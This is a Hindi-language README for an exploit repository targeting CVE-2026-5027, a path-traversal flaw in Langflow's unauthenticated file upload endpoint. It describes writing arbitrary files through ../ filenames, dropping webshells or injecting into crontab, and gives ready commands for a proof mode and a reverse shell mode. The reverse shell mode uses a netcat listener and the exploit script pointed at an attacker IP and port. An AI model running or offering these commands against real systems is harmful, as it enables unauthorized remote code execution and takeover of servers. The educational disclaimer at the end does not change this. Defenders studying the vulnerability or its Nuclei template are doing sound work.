
CVE-2026-5027
मनमाना फ़ाइल लेखन से RCE
फ़ाइल अपलोड के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन
Langflow में फ़ाइल अपलोड एंडपॉइंट (POST /api/v2/files) में एक गंभीर पाथ ट्रैवर्सल भेद्यता है।
एक हमलावर ../ अनुक्रम वाला दुर्भावनापूर्ण फ़ाइलनाम भेजकर सर्वर फाइलसिस्टम पर कहीं भी मनमानी फ़ाइलें लिख सकता है।
यह आसानी से पूर्ण रिमोट कोड निष्पादन (RCE) की ओर ले जाता है — उदाहरण के लिए वेबशेल डालकर या क्रॉनटैब में इंजेक्ट करके।
/tmp में टेस्ट फ़ाइल लिखता है)python3 CVE-2026-5027.py -t http://target:7860/ --proof
यदि भेद्य है तो अपेक्षित आउटपुट:
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
# Start listener
nc -lvnp 4444
# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
| File | विवरण |
|---|---|
CVE-2026-5027.py | मुख्य पायथन एक्सप्लॉइट (PoC + RCE) |
CVE-2026-5027.yaml | स्कैनिंग के लिए Nuclei टेम्पलेट |
README.md | यह फ़ाइल |
प्रूफ मोड
python3 CVE-2026-5027.py -t http://target.com/ --proof
रिवर्स शेल मोड
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर जिनके परीक्षण की आपके पास स्पष्ट अनुमति है।
रेड टीम समुदाय के लिए ❤️ के साथ बनाया गया